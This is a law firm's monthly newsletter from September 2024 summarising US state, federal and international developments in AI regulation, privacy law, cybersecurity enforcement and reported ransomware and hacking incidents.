Right To Know - September 2024, Vol. 21

Cyber, Privacy, and Technology Report

Welcome to your monthly rundown of all things cyber, privacy, and technology, where we highlight all the happenings you may have missed.

View previous issues and sign up to receive future newsletters by email here. 

State Action:  

• Illinois Regulates Use of AI In Employment Decisions: On August 9, Illinois Governor J.B. Pritzker signed an amendment to the Illinois Human Rights Act that addresses the use of artificial intelligence in employment decisions. Under the amendments, which become effective January 1, 2026, artificial intelligence includes not only machine-based systems that can make predictions, recommendations, or decisions, but also “Generative Artificial Intelligence,” such as computing systems that respond to human prompts with simulated “human-produced content.”  Employers that utilize artificial intelligence in connection with “recruitment, hiring, promotion, renewal of employment, selection for training or apprenticeship, discharge, discipline, tenure, or the terms, privileges, or conditions of employment,” will be required to provide notice to employees about the use of AI.  Additionally, the amendments prohibit using AI that has the effect of discriminating against protected classes in employment decisions and prohibits the use of “zip codes as a proxy for protected classes” under the Act.   The Illinois Department of Human Rights is charged with promulgating rules to implement and enforce the amendments.
• New York Attorney General Continues Focus on Consumer Rights: The New York Attorney General has published two new guidance documents focused on the privacy of consumer data and online tracking. These documents, a Business Guide to Website Privacy Controls and a Consumer Guide to Tracking on the Web, seek to provide businesses guidance on compliance with New York privacy laws and provide consumers tips on protecting their information while on-line. This is a continuation of the OAG’s focus on consumer protections and could signal a need for businesses that that have an online presence to start looking closer at their compliance with NY state privacy laws.
• California Legislature Passes Controversial Artificial Intelligence Bill: On August 28, 2024, the California legislature passed a controversial artificial intelligence safety bill. The bill would require developers of artificial intelligence models that cost more than $100 million to develop, or those that require a defined amount of computing power to train (and those providing that computing power) to implement appropriate safeguards and policies to prevent defined critical harms, including the capability to completely shut down the model. This bill would establish a state entity to oversee the development of artificial intelligence models and calls for the creation of a consortium to develop a framework for a public cloud computing cluster. The bill would also grant the California Attorney General the power to sue if developers are not compliant, particularly in the event of an ongoing threat to public safety. The bill also requires developers to hire third-party auditors to assess their safety practices and provides additional protections to whistleblowers speaking out against abuses of artificial intelligence. The bill now heads to Governor Gavin Newsom, who has until Sept. 30 to decide whether to sign it into law or veto it.
• Illinois Amends its Biometric Information Privacy Act: On August 2, 2024, Illinois amended its Biometric Privacy Act (BIPA), expressly limiting liability to a single violation per individual, regardless of the number of biometric scans, as long as the scans are collected in the same manner. This amendment addresses ruling by the Illinois Supreme Court in Cothron v. White Castle System, Inc., that held that damages accrue every time an entity collects and individual’s biometric data. The amendment also recognizes electronic signatures as valid written consent for collecting and sharing biometric data.

Regulatory:  

• SEC Amendments to Regulation S-P Amendments Now in Effect: Starting August 4, 2024, Covered Institutions must comply with the new amendments to Regulation S-P. The amendments apply to broker-dealers, investment companies, and registered investment advisors, and transfer agents. Key provisions include requiring covered institutions to develop, implement, and maintain written policies and procedures for an incident response program that is reasonably designed to detect, respond to, and recover from unauthorized access to or use of customer information, and requiring covered institutions to provide timely notification within 30 days to affected individuals whose sensitive customer information was, or is reasonably likely to have been, accessed or used without authorization.
• CISA Opens Incident Reporting Portal: On August 29, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) announced that its cyber incident reporting form has moved to its new CISA Services Portal, a secure platform with enhanced functionality for cyber incident reporting and updating. Reporting is voluntary for now but will become mandatory for some businesses and organizations when regulations under the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) become final. Under the current Proposed Rule, CIRCIA will require covered critical infrastructure entities to report substantial cyber incidents to CISA within 72 hours and ransomware attacks within 24 hours. The law requires CISA to issue a final rule by October 2025. CISA encourages voluntary reporting of cyber incidents (until mandatory requirements take effect, and for entities and events for which reporting is not mandatory) and has provided a Voluntary Cyber Incident Reporting Resource. (Links to the Portal and Resource are included in CISA’s News Release.) It is important for businesses and organizations to understand these requirements and incorporate reporting (especially if mandatory) to CISA in their incident response plans.
• HHS OCR Announces a $115,200 Civil Monetary Penalty for Failure to Provide Timely Access to Patient Records: On August 1, 2024, the U.S. Department of Health and Human Services (“HHS”) Office for Civil Rights (“OCR”) announced their latest enforcement actions under the Right of Access initiative. American Medical Response (“AMR”), a provider of emergency medical services across the United States, agreed to pay a civil monetary penalty of $115,200 after OCR received a complaint that AMR provided a patient with access to their medical records only after four requests, and 370 days after the initial request. The settlement marks OCR’s 49th enforcement action relating to individuals being given timely access (within 30 days with the possibility of one 30-day extension) to their health information.

Litigation & Enforcement:  

• Texas Continues Privacy Enforcement – Sues GM and OnStar: On August 13, 2024, Attorney General Ken Paxton filed suit on behalf of the State of Texas against General Motors and its subsidiary OnStar. According to the lawsuit, GM used telematics systems installed in its 2015 and later vehicles to capture data on its customers’ driving habits including speed, seat belt usage, travel direction, driving time and location-related information.  Texas claims that GM “aggressively” sought have its customers sign-up for various products and applications that captured this data, by claiming that the products would improve their experience and safety with the vehicle but failed to properly disclose the collection of the information or its use.  The State further alleges that GM sold the parts or all of the data, including to various companies, including insurance-related companies and companies that would re-sell the data.  The lawsuit claims violations of the Texas Deceptive Trade Practices Act.
• Illinois Federal Court Examines GIPA Claims: Judge Sharon Coleman of the United States District Court for the Northern District of Illinois issued two of the first federal decisions applying a substantive analysis to some of the key provisions of GIPA in the employment context. The pair of cases arose out of allegations that the defendant employers required the plaintiff employees to undergo a pre-employment medical examination during which they were asked about their family medical history.  The plaintiffs claimed, and the court agreed on a motion to dismiss, that such questions could constitute requests for genetic information prohibited under the statute.  The court examined numerous issues including the extraterritoriality of GIPA and statute of limitations concerns.  Clark Hill issued a detailed alert on these cases.
• Law Firm Loses Funds Wired to Client: Nagel Rice, a New Jersey personal injury firm, filed a lawsuit against TD Bank for losses stemming from a check fraud scam. The suit was originally filed in July but was removed to federal court in New Jersey this week.  Nagel Rice alleges that TD Bank failed to detect and warn about cashier’s check issued by BBVA Bank.  The suit alleges that BBVA Bank has a history of issuing fraudulent checks and that TD Bank had knowledge of it. Nagel Rice received a cashier’s check in the amount of $148,950.00 from a “purported client” drawn on BBVA on November 23, 2020.  According to the complaint, on that same day, Nagel Rice attempted to deposit the cashier’s check in its account with TD Bank.  Two days later, on November 25, 2020, Nagel Rice alleges it wired $146,250.00 from its account at TD Bank to the purported client’s bank account.  On December 1, 2020, Nagel Rice claims it received a letter via regular mail dated November 25, 2020, from TD Bank advising it, for the first time, that the cashier’s check had bounced.  That same day, Nagel Rice’s office manager spoke with an employee of TD Bank who allegedly admitted that TD Bank had received many prior fraudulent checks drawn from BBVA.  Nagel Rice sued TD Bank under theories of negligence and breach of contract.  TD Bank has yet to respond to the plaintiff’s allegations.
• SEC Charges Equiniti Trust Co. with Failing to Protect Client Funds from Cyber Attacks: The SEC has settled its investigation into cybersecurity failings at securities transfer agent Equiniti, formerly American Stock Transfer & Stock Company, for $850,000. The SEC alleged that Equiniti had insufficient safeguards in place that allowed two separate cyber attacks to occur, resulting in the loss of $6.6 million of client funds. The first attack stemmed from a business email compromise that allowed a threat actor to imitate an employee of an issuer and request that millions of new stocks be sold and liquidated, with the proceeds transferred to a Hong Kong bank. Despite warning to its employees to be alert to fraudulent wire transfer requests, the company followed the instructions without conducting additional checks. The other incident stemmed from the creation of fraudulent accounts using legitimate Social Security numbers. Equiniti linked the fraudulent accounts to the legitimate accounts allow the threat actors to have access to, and liquidate, client assets and then transfer the proceeds to the threat actors. Equiniti was able to recover some of the lost funds and reimbursed their clients for any shortfall.
• S. Department of Justice Joins Lawsuit Against Georgia Tech Alleging Cybersecurity Violations: On August 28, 2024, the U.S. Department of Justice (DOJ) announced that it had filed a complaint-in-intervention to join United States ex rel. Craig v. Georgia Tech Research Corp, et al., a whistleblower case alleging that Georgia Tech knowingly violated cybersecurity requirements for defense contracts.  The lawsuit alleges that Georgia Tech (1) failed to develop and implement a system security plan, (2) failed to properly scope the plan when it belatedly implemented it, (3) failed to install, update or run anti-virus or anti-malware tools on desktops, laptops, servers and networks at a lab — to satisfy the demands of a professor who headed the lab, and (4) submitted a false cybersecurity assessment score to the Department of Defense. The whistleblower action was filed by two former senior members of Georgia Tech’s cybersecurity compliance team. The intervention was under DOJ’s Civil Cyber Fraud Initiative announced on October 6, 2021, designed to hold entities or individuals that put U.S information or systems at risk by knowing violations of cybersecurity, monitoring, and reporting requirements accountable.
• T-Mobile Fined $60 Million Over Security Issues: The Committee on Foreign Investment in the United States (CFIUS) has fined T-Mobile $60 million, which is the largest in CFIUS’ history. The fine came after CFIUS found that “T-Mobile failed to take appropriate measures to prevent unauthorized access to certain sensitive data and failed to report some incidents of unauthorized access promptly to CFIUS, delaying efforts to investigate and mitigate any potential harm.” The fine’s severity was also based on T-Mobile’s delay in reporting the security incident.
• HHS OCR Files Notice of Appeal In Response to the United States District Court for the Northern District of Texas’s Decision in Online Tracking Technologies Case: On August 19, 2024, the US Department of Health and Human Services (HHS) Office for Civil Rights (OCR) filed a notice of appeal of the United States District Court for the Northern District of Texas’s June 20, 2024, decision in American Hospital Association, et al. v. Xavier Becerra, et al. In that case, the court held that OCR exceeded its authority in regard to a bulletin concerning HIPAA’s application to cookies and other online tracking technologies on HIPAA-regulated entities’ webpages that are publicly available and do not require users to log in before they are able to access the webpage. Although HHS OCR’s notice of appeal does not specify the arguments to be made on appeal, it is expected that they will present their arguments about why the court’s decision should be overturned.

International Updates:

• Privacy Notice Generator for SME’s issued by U.K. Information Commissioner’s Office: On August 20, 2024, the U.K. Information Commissioner’s Office officially launched its Privacy Notice Generator. The Generator creates two different types of notices; one for organizations to utilize with customers, and the other for use with staff members and volunteers. The Generator is designed to ease compliance and notification burdens for U.K. based small and medium sized enterprises. The Generator replaces the previous Word document-based template and is one component of the Information Commissioner’s Office’s plan to streamline some of its key services.
• Dutch Data Protection Authority fines UBER €290 Million: Autoriteit Persoonsgegevens, the Dutch Data Protection Authority (“DDPA”) has imposed a fine of €290 million on Uber due to transfers of Uber drivers’ personal data outside of the European Union. An investigation was launched by the DDPA on Uber following more than 170 complaints from French Uber drivers to French human rights interest group Ligue des droits de l’Homme. The complaints where then forwarded to the DDPA as Lead Supervisory Authority for Uber. The DDPA investigation concluded that there had been a breach of Article 44 of the General Data Protection Regulation and imposed the fine on Uber.
• October Will be the 21st Annual Cybersecurity Awareness Month: October will be the 21st Annual Cybersecurity Awareness Month cosponsored by the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA). It’s “a dedicated month for the public and private sectors to work together to raise awareness about the importance of cybersecurity.” The theme is “Secure Our World,” which will be a continuing theme for future years. This year’s campaign focuses on four basic actions to stay safe online at home, work, and school: (1) Recognize and Report Phishing, (2) Use Strong Passwords (and Password Managers), (3) Turn on MFA (Multifactor Authentication), and (4) Update Software. CISA and NCA have prepared a Toolkit that businesses and organizations can use for campaigns for the month tailored to their employees. The Toolkit can also be helpful for reviewing and updating cybersecurity awareness and training programs.
• Ireland’s Cybersecurity Centre publishes National Emergency Plan: The National Cyber Security Centre (NCSC) of Ireland has published its National Cyber-Emergency Plan. Developed after various exercises and lessons learned in the HSE (National Health Service) attack in 2021, the plan sets out critical thresholds for declaration of a national cyber-emergency, as well as strategies for management, response, and appropriate accountabilities.  Interestingly, the threshold for a “cyber-emergency” is defined as, among other circumstances, any cyber incident causing or threatening to cause death or serious injury or damage to property or the economy.  The response plan calls for various modes of escalatory response up to “full activation mode” requiring activation of the National Emergency Coordination Group.

Industry Updates:  

• NSA Issues Joint Guidance with Allies on Event Logging: Cybersecurity adversaries are increasingly utilizing techniques that leverage native, legitimate tools on the victim’s network. These techniques, commonly referred to as Living off the Land (“LOTL”), are traditionally very difficult to detect because they use things that a defender would expect to see on the network. The National Security Agency (“NSA”), along with several international partners, has published guidance on best practices for event logging to maximize a defender’s ability to detect and respond to attacks utilizing LOTL techniques.
• Iranian Government Hackers Acting as Initial Access Brokers for Ransomware Gangs: On August 28, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) issued joint guidance alerting network defenders that Iranian government actors were acting as initial access brokers for ransomware gangs. The Iranian threat actors are targeting victims in the education, finance, healthcare and defense sectors and once access to the victim network has been established, are transferring that access to ransomware groups to exploit. CISA also advises reviewing their guidance on Iranian state-sponsored cyber attacks.
• Hackers Claim to Have Stolen Sensitive Data from U.S. Marshals Service: The hacking group Hunters International says it has stolen more than 380 gigabytes of data from the U.S. Marshals Service (“USMS”). Screenshots of the stolen records, which include confidential information about gangs, active cases, and electronic surveillance, were posted to the group’s leaksite.  USMS experienced a ransomware attack in February of 2023 which took down their network for over 10 weeks.  At that time, the USMS did not disclose whether any data was stolen, nor acknowledged paying a ransom. USMS spokesperson Brady McCarron has said that USMS “has evaluated the materials posted by individuals on the dark web, which do not appear to derive from any new or undisclosed incident.”  Hunters International operates as a ransomware-as-a-service operation where cybercriminals lease out ransomware tools to other attackers in exchange for a share of the profits generated from successful attacks.
• Halliburton Confirms Cyber Attack: In a form 8-K SEC filing, Halliburton, a major energy company, confirmed that an “unauthorized third party gained access to certain systems.” The incident marks a continued threat to the energy sector. While Halliburton has not reported any impact to services, the Department of Energy continues to be involved when energy companies experience cybersecurity incidents requiring reporting in the event of cybersecurity incidents.
• Guilty Plea for Owners of 1-Time Passcode Theft Service: Three men in the United Kingdom pled guilty to operating a website that allowed criminals to evade multi-factor authentication and access credit card verification sites. Provided as a subscription, criminals were charged a monthly fee of £30 for the basic level service, and £380 for premium. The service helped subscribers socially engineer bank account holders into disclosing their one-time passcode or other personal information and then complete fraudulent transactions.
• Ransomware Season Arrives Early, According to a New Report by Corvus Insurance: Corvus Insurance’s Q2 2024 Cyber Threat Report, reveals a significant rise in ransomware activity, with 1,248 victims identified, marking the second-highest number in a single quarter. New ransomware groups emerged following the takedown of prominent gangs, driving a 16% increase in attacks compared to Q1 2024. The report highlights a surge in ransomware demands and payouts, with average demands reaching over $1.5 million, a 102% increase from the previous quarter. The study also emphasizes the growing prevalence of double-extortion tactics, with data theft involved in 93% of incidents, and notes the construction industry as the most frequently targeted sector in Q2, with significant increases in attacks on the IT Services and Consulting sectors.

This publication is intended for general informational purposes only and does not constitute legal advice or a solicitation to provide legal services. The information in this publication is not intended to create, and receipt of it does not constitute, a lawyer-client relationship. Readers should not act upon this information without seeking professional legal counsel. The views and opinions expressed herein represent those of the individual author only and are not necessarily the views of Clark Hill PLC. Although we attempt to ensure that postings on our website are complete, accurate, and up to date, we assume no responsibility for their completeness, accuracy, or timeliness.